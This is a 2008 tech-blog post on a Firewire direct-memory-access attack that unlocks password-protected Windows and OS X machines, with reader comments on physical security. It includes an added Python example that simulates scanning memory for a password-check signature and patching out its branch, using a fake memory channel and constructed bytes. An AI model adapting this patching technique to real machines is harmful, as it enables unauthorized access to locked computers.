Windows passwords easily bypassed over Firewire
All of a sudden we're starting to see more and more attacks take advantage of what's sitting in your computer's RAM. The latest, from New Zealand's Adam Boileau, lets an attacker unlock a password-protected Windows machine in just a few seconds using a Linux box connected over Firewire. Unlike the disk encryption attacks we saw recently that required a reboot, Boileau's attack works while the target computer is running: the attacking host shows up on the Firewire bus as a storage device, Windows grants it direct memory access, and the tool then reads and patches the in-memory password-checking code so that any password is accepted. That's a little scary, but other researchers point out that it's not a traditional vulnerability, since direct memory access is a feature of Firewire and works the same way on any OS that implements the spec. Still, we're sealing up all of our ports with Silly Putty starting today; that ought to stop 'em.

Update: Apparently this has been demonstrated on OS X as well. It looks like Firewire's direct memory access is the common vector here.
[Thanks, Drew]
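To make the mechanism concrete, here is an added example that is not part of the original post and is not Boileau's winlockpwn tool. It models the core primitive such a tool uses once DMA has been granted: walk the target's physical memory one page at a time, locate a code signature, and overwrite it. Everything is constructed for the illustration: the `FakeDmaChannel` is an in-memory stand-in for a real 1394 read/write handle, and the signature and patch bytes are a generic `test eax,eax / je` pair with the conditional jump NOPed out, not the real bytes from any Windows DLL. The step where the attacking host presents itself as a storage device so that Windows enables DMA happens before this code and is not shown.

```python
"""
Added example (not part of the original post or of winlockpwn).
Models the scan-and-patch primitive of a Firewire/DMA password bypass
against a fake in-memory "physical memory". Signature and patch bytes
are constructed for illustration and are NOT real Windows code bytes.
"""
from __future__ import annotations
from typing import Optional

PAGE = 4096  # DMA reads are done one page at a time

class FakeDmaChannel:
    """Stand-in for a libraw1394-style physical read/write handle (constructed)."""
    def __init__(self, physical_memory: bytearray) -> None:
        self.mem = physical_memory

    def size(self) -> int:
        return len(self.mem)

    def read(self, addr: int, length: int) -> bytes:
        return bytes(self.mem[addr:addr + length])

    def write(self, addr: int, data: bytes) -> None:
        self.mem[addr:addr + len(data)] = data

def parse_signature(sig: str) -> list[Optional[int]]:
    """'8B 45 ?? 85 C0' -> [0x8b, 0x45, None, 0x85, 0xc0]; '??' is a wildcard byte."""
    return [None if tok == "??" else int(tok, 16) for tok in sig.split()]

def match_at(buf: bytes, off: int, pat: list[Optional[int]]) -> bool:
    if off + len(pat) > len(buf):
        return False
    return all(p is None or buf[off + i] == p for i, p in enumerate(pat))

def find_signature(chan: FakeDmaChannel, sig: str, start: int = 0,
                   end: Optional[int] = None) -> Optional[int]:
    """Scan memory page by page. len(pat)-1 bytes of the previous page are
    carried over so a signature straddling a page boundary is still found."""
    pat = parse_signature(sig)
    end = chan.size() if end is None else end
    carry = b""
    addr = start
    while addr < end:
        chunk = chan.read(addr, min(PAGE, end - addr))
        buf = carry + chunk
        base = addr - len(carry)          # physical address of buf[0]
        for off in range(len(buf) - len(pat) + 1):
            if match_at(buf, off, pat):
                return base + off
        carry = buf[-(len(pat) - 1):] if len(pat) > 1 else b""
        addr += len(chunk)
    return None

def patch(chan: FakeDmaChannel, sig: str, patch_bytes: bytes,
          patch_offset: int = 0) -> Optional[int]:
    """Locate sig, write patch_bytes at sig+patch_offset, read back to verify.
    Returns the patched address, or None if the signature was not found."""
    addr = find_signature(chan, sig)
    if addr is None:
        return None
    target = addr + patch_offset
    chan.write(target, patch_bytes)
    if chan.read(target, len(patch_bytes)) != patch_bytes:
        raise RuntimeError("DMA write did not stick at 0x%x" % target)
    return target

# Constructed "password check": mov eax,[ebp+disp8]; test eax,eax; je rel8.
# The patch turns the 2-byte 'je' into two NOPs so the failure branch is never taken.
SIGNATURE = "8B 45 ?? 85 C0 74 ??"
PATCH = b"\x90\x90"
PATCH_OFFSET = 5

def build_sample_memory() -> bytearray:
    """Three pages of int3 padding with the constructed check placed so that it
    straddles the first page boundary (exercises the carry-over logic)."""
    mem = bytearray(b"\xcc" * (3 * PAGE))
    code = bytes.fromhex("8B4508" "85C0" "7412")
    at = PAGE - 3
    mem[at:at + len(code)] = code
    return mem

def demo() -> Optional[int]:
    chan = FakeDmaChannel(build_sample_memory())
    return patch(chan, SIGNATURE, PATCH, PATCH_OFFSET)

if __name__ == "__main__":
    print("patched at 0x%x" % demo())
```

The read-back after the write is the check a practitioner wants: on a real target the write can silently fail (wrong address window, the controller's physical-request filter not enabled, the page paged out), and patching nothing while reporting success is worse than an obvious error. The same page-walking loop, minus the write, is what Firewire-based memory acquisition for forensics does.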
Reader Comments (Page 1 of 2)
Ignatius @ Mar 4th 2008 1:47PM
Another reason why USB is superior. All hail USB 3.0's coming.
Phil Perman @ Mar 4th 2008 2:08PM
Although to be fair, that's like saying your PC is harder to hack because it hasn't got a network card. Superiority through inferiority.
josh @ Mar 4th 2008 2:13PM
"Although to be fair thats like saying your pc is harder to hack because it hasn't got a network card. Superiority through inferiority"
No, it's like saying your network shouldn't have direct memory access, which it shouldn't. Networking does not require DMA; there is no valid reason that one production machine should be able to directly access another production machine's memory (the operative word being production; if you are doing software development there are plenty of reasons that might be useful). Surprise surprise, that is a huge security risk and it always has been.
ujn @ Mar 4th 2008 2:27PM
But hey, DMA is done for performance. Cut DMA and your computer will die processing network traffic!
rob @ Mar 4th 2008 2:35PM
You will be able to accomplish the same thing on a notebook with Cardbus or Expresscard (the PCI version), since the card can request a DMA and access all memory.
Kelmon @ Mar 4th 2008 3:42PM
"Another reason why USB is superior"
Another?
Raptor007 @ Mar 4th 2008 4:01PM
Ignatius was probably trying to choose "Ignoramus" as his name, but didn't know how to spell it properly.
Ignatius @ Mar 4th 2008 4:08PM
Wow. Flaming me by making a pun on my name? Yeah, that's the way to be cool.
Jon Doe. @ Mar 4th 2008 6:11PM
Yah meanwhile USB 2 is slow as shit for hard drive access. Sorry but I'll keep my FW800 drive and its stupidly fast transfer rates.
Kamokazi @ Mar 4th 2008 1:52PM
Hmm...I wonder if something similar can be performed on OSX? I thought I heard something about a MBP/PowerBook firewire exploit?
Quick Google turned up this: http://www.codeangel.org/article/crack_a_mac_with_firewire
I guess it's a major firewire problem...wonder if it affects Firewire 800 as well?
DJZeratul @ Mar 4th 2008 1:57PM
Did you know you could reset the administrator password on any mac by using the install DVD?
GASP!
Kamokazi @ Mar 4th 2008 2:15PM
No, I didn't. I only know the basics on OSX. While the demo just showed an admin password being changed, the possibilities are much more severe. But just like this one for Windows, it requires physical access to the computer...so it's not something to be overly concerned about.
josh @ Mar 4th 2008 2:15PM
the firewire specification (sorry IEEE 1394 spec) calls for DMA. Any system that implements direct memory access per the specification (so pretty much everybody) is susceptible to attacks that focus on direct memory access.
Jason @ Mar 4th 2008 3:27PM
If you have physical access to a Windows PC, you can literally do anything to it. It's just a matter of how quickly you can get it done. That Firewire approach sure is convenient though...
miko34 @ Mar 4th 2008 1:52PM
Silly Putty won't stop that. That's just silly. You're silly.
Ignatius @ Mar 4th 2008 2:00PM
Hammer'll do just fine.
Green @ Mar 4th 2008 2:12PM
Hi Grimey old buddy.
Aashish Jain @ Mar 4th 2008 2:17PM
Take a deep breath Grimey.. the high voltage wires _will_ kill you :)
jonouk @ Mar 4th 2008 6:11PM
take it you saw that episode tonight on c4? that is a legendary episode
Matt @ Mar 4th 2008 2:01PM
Or you could just disable the port in the BIOS. Well, of course, unless your BIOS is feature-thin, then this could be a problem...
RoboDan @ Mar 4th 2008 4:03PM
Yay for Thinkpads and being able to disable ports!
Don't even try this on a Dell ;)
TheKillerDynamo @ Mar 4th 2008 2:03PM
How many PCs come with Firewire now anyway? I know mine sure doesn't, and most of the non-Macs I've seen around campus don't have it either. It seems like this attack might be a bit limited.
rob @ Mar 4th 2008 2:38PM
pretty much every notebook has Cardbus and/or Expresscard. Just slot in a Firewire adapter. Although admittedly (at least on windows) it will just be sitting there asking for a driver disk.
PeterF @ Mar 4th 2008 4:16PM
Are you serious? EVERY laptop I see has a firewire port.
The Dude @ Mar 4th 2008 6:32PM
I've got a Toshiba Satellite notebook (albeit it's labeled "iLink") and two HP desktops purchased in the past 3 years that have 2 firewire ports (1 in front, 1 in back). The thing is I have absolutely no firewire devices so I've disabled the ports since day 1.
pathogen @ Mar 4th 2008 2:06PM
In other news if you allow someone physical access to your computer they might steal it.
josh @ Mar 4th 2008 2:48PM
Arg, my reply to the follow up comments got dropped below. The gist of it was that while your ethernet chipset has DMA, your network through it does not. You have to trust the internal components of your system to work correctly. In firewire what you are saying is that you now trust external components to also behave correctly, which in the corporate world where insider attacks are very real, is a bad decision. In this case it is your network rather than your network controller that has DMA.
CraigJ @ Mar 4th 2008 2:53PM
Yeah, if someone busts into my house I have more to worry about than violation of my Firewire ports...
sully @ Mar 4th 2008 2:10PM
According to slashdot, Adam Boileau brought this to the attention of MS years ago. After nothing was done, he decided that the way to fix the problem was to free up his tool.
(Really trying hard not to be a microsoft hater)
josh @ Mar 4th 2008 2:23PM
That's a load of crap. It is a flaw in the very design of firewire, as originally authored by Apple. The primary difference between firewire and USB is that firewire does not require the CPU to control all of its actions. To get around needing the CPU as an arbiter for system access the specification specifically requires direct memory access. For a vendor to fail to implement DMA their implementation just won't work with any device expecting it, and MS would have been pounded for deviating from the standard (and get flamed for that).
This attack literally cannot be fixed without completely throwing out the current Firewire spec and starting over (at which point, just use USB), and throwing out every device implemented to spec. The only thing MS can be blamed for is implementing an inherently insecure specification authored by someone else (it would never have made it through MS's SDL if written in house).
And to be clear, this attack is possible against any system that implements Firewire. If this author was responsible he would have lobbied for the specification to be altered rather than for a particular vendor implementing the specification to break compatibility.
Neal @ Mar 4th 2008 2:25PM
Any time anyone has *physical* access to any machine, you will never have security. This is why servers that house critical data are in secure, lights-out datacenters with guards on site 24/7, card readers, cameras present, palm readers, and bulletproof glass. Why would MS respond to something that is working as the specifications of the standard intended?
Physical security will always be a downfall in overall security; no amount of logical security will ever take its place.
craig @ Mar 4th 2008 5:06PM
josh, you're changing your tune as your comments progress. At first you said that networking should not have DMA (which is laughably false), then said that ethernet had DMA but "the network" does not, and now say that the problem is the firewire's specification is inherently insecure.
DMA, specifically zero-copy, is the holy grail of networking. Without it, throughput will be capped. To implement zero-copy, not only do the devices need DMA but "the network" needs it, so DMA has every business being part of networking. The problem here is a crappy implementation of DMA in networking, not an example of why DMA shouldn't be part of it.
martin @ Mar 4th 2008 2:16PM
wont someone please think of the children?!
macona @ Mar 4th 2008 3:08PM
Firewire had children? Why wasn't I invited to the baby shower?
fistpittingnork @ Mar 4th 2008 2:16PM
Homemade boot cds with locksmith programs or password-changer on a flash drive sounds easier.
Dan @ Mar 4th 2008 6:47PM
good call dude. I use ERD commander's locksmith all the time... that program is the shit
TheAxMan @ Mar 4th 2008 2:17PM
Engadget, engadget, engadget. Stop taking stuff directly from Slashdot and posting it here -- don't you know they're rabid anti-MS fanboys?
This is a feature of Firewire. By design it allows direct access to the DMA controller, and this 'bug' is present in Linux, BSD, OS X, Windows!
So at least do a little research before posting this stuff..
Blaktornado @ Mar 4th 2008 2:59PM
"don't you know they're rabid anti-MS fanboys?"
Isn't Engadget?
(Hint: Answer = no)
Oreynid @ Mar 4th 2008 2:20PM
This "exploit" requires physical access to the machine. Not to mention, that one could use a password reset utility to boot from and accomplish the same thing.
Firewire has direct memory access because it was designed that way. It also allows for faster sustained transfers between devices because the CPU doesn't have to be involved. I like my firewire...or wait IEEE 1394, and I have enough smarts to keep my computer in a safe place to not allow for physical access by unauthorized persons.
martin @ Mar 4th 2008 2:20PM
I don't need Firewire because I'm Homer Simpson!
fistpittingnork @ Mar 4th 2008 2:28PM
Shhh, this is the internet, you're Mr. X.
Homeboy @ Mar 4th 2008 2:26PM
Last year I sent my laptop in for repair, but just before it got picked up I changed the password. When I got it back I had no clue what the new password was. As frustrated as I was, formatting was not an option since it would take one or two days to download all the software I need and get it set up properly. So I sat at my desktop, lurked around the net and found a surprisingly easy way to clear the password in Vista.
It involves downloading a 34MB program which is then burnt on to a bootable disc. Boot the computer from the disc and after a few button presses you have cleared the password. Although you can just clear or change it, you can't see what it was. But still, it's incredibly easy and, may I say, unsafe? I still have the disc and can get into pretty much every XP or Vista computer which is password protected.
redspear @ Mar 4th 2008 2:34PM
Well, the same is true of OS X: forget your password and you can go ahead and boot an OS X install disc and then reset it.
Gorillamonk @ Mar 4th 2008 2:46PM
send me a link. my fam is forever forgetting their pass. And I'm sick and tired of reinstalling. hit my email
macserv @ Mar 4th 2008 3:01PM
That can't be accomplished quite as easily if you set an Open Firmware or EFI password. You'll need that password before you can boot off of any device (including the internal optical drive) other than your chosen startup volume.
With that in place, a Mac OS X system conforms to tighter security standards for workstation use, assuming the CPU itself is locked away safely.
redspear @ Mar 4th 2008 3:16PM
Macsev,
You just need to alter the amount of RAM at start up then, or press Ctr-Option-P-R if it hasn't been disabled. Of course one of those requires access to the CPU.
Windows machines are also capable of having a BIOS password as well, and assuming the CPU is locked up tight and away you won't be able to change that through any external command I know of (you have to remove the battery or switch a jumper to set the BIOS to default).
RoboDan @ Mar 4th 2008 4:03PM
Thank God for Thinkpads
ie. Startup password for mobo and hard drive encryption.
Yay security chip.
Old Dell computers did the same thing... except more poorly as they did not have a security chip and offered only a startup hard drive password.
crescentdavid @ Mar 4th 2008 2:31PM
"Update: Apparently this has been demonstrated on OS X as well -- it looks like Firewire's direct memory access is the common vector here."
Apparently you've never heard of updating erroneous and misleading titles once folks with some real tech knowledge have set you straight.
Here, it's easy. I'll help! "Computer Passwords Easily Bypassed over Firewire." There, that wasn't so hard, was it? So get busy.
The Dude @ Mar 4th 2008 3:19PM
That's expecting entirely too much from this site.
bigdoggie @ Mar 4th 2008 2:31PM
*Buys a few Linux loaded EEE PCs..*
.Rawr! >:3